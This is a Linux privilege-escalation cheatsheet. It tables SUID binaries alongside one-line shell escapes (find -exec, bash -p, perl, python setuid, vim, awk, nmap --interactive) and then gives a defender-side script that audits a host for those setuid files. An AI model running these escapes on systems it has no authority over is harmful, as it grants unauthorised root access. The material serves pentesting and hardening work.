https://cheatsheet.haax.fr/linux-systems/privilege-escalation/suid/
# Dangerous SUID Binaries to Look For
| Binary | Reason it's Dangerous | Exploit Idea |
|---|---|---|
| /usr/bin/find | Allows executing arbitrary commands via -exec | `find / -exec /bin/bash -p \; -quit` |
| /bin/bash | If SUID, run with -p to retain root | `/bin/bash -p` |
| /bin/sh | If symlink to bash, may work with -p | `/bin/sh -p` |
| /usr/bin/perl | Perl can be used to spawn a shell | `perl -e 'exec "/bin/bash";'` |
| /usr/bin/python | Python can be used to spawn a shell | `python -c 'import os; os.setuid(0); os.system("/bin/bash")'` |
| /usr/bin/env | Can execute another binary | `env /bin/bash -p` |
| /usr/bin/vim | Can spawn shell with :!bash | `vim -c '!bash'` |
| /usr/bin/nmap | Some versions have interactive shell | `nmap --interactive` |
| /usr/bin/less | If SUID, can be abused via !sh | Inside less, press `!sh` |
| /usr/bin/awk | Can spawn shell | `awk 'BEGIN {system("/bin/bash")}'` |
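The same list is useful from the defender's side: a host hardening check should enumerate every setuid file and flag any whose name appears in the table above, since none of these binaries has a legitimate reason to carry the SUID bit on a normal system. The script below is an added example, not part of the cheatsheet; the function names (`list_suid`, `flag_dangerous`, `audit_suid`) and the `DANGEROUS_SUID` name list derived from the table are assumptions made for this illustration.

```shell
#!/bin/sh
# Defender-side SUID audit: find setuid files under a root and report the
# ones whose basename matches the "dangerous" list from the table above.
# Example script added for illustration; not part of the original cheatsheet.

# Basenames taken from the table above (constructed list for this example).
DANGEROUS_SUID="find bash sh perl python env vim nmap less awk"

# Print every regular file with the setuid bit set below $1 (default: /).
# -xdev keeps the scan on one filesystem; errors (unreadable dirs) are dropped.
list_suid() {
    find "${1:-/}" -xdev -type f -perm -4000 2>/dev/null
}

# Read one path per line on stdin and echo those whose basename is on the
# dangerous list. Matching is exact on the basename, so /usr/bin/find and
# /tmp/find are both flagged, while /usr/bin/findmnt is not.
flag_dangerous() {
    while IFS= read -r path; do
        name=$(basename "$path")
        for d in $DANGEROUS_SUID; do
            if [ "$name" = "$d" ]; then
                printf '%s\n' "$path"
                break
            fi
        done
    done
}

# Scan a tree and print only the risky setuid files it contains.
audit_suid() {
    list_suid "$1" | flag_dangerous
}

# Count of risky setuid files under a tree (0 is the healthy answer).
audit_suid_count() {
    audit_suid "$1" | wc -l | tr -d ' '
}

# Stand-alone use: audit the whole host when run directly.
if [ "${1:-}" = "--run" ]; then
    audit_suid /
    echo "dangerous setuid files: $(audit_suid_count /)"
fi
```

Run it as `sh suid_audit.sh --run` on a host; any output line is a finding to investigate, and a non-zero count is a sensible failure condition for a compliance check. A hit does not always mean compromise (a packaging mistake can set the bit too), but each one should be explained or removed with `chmod u-s`.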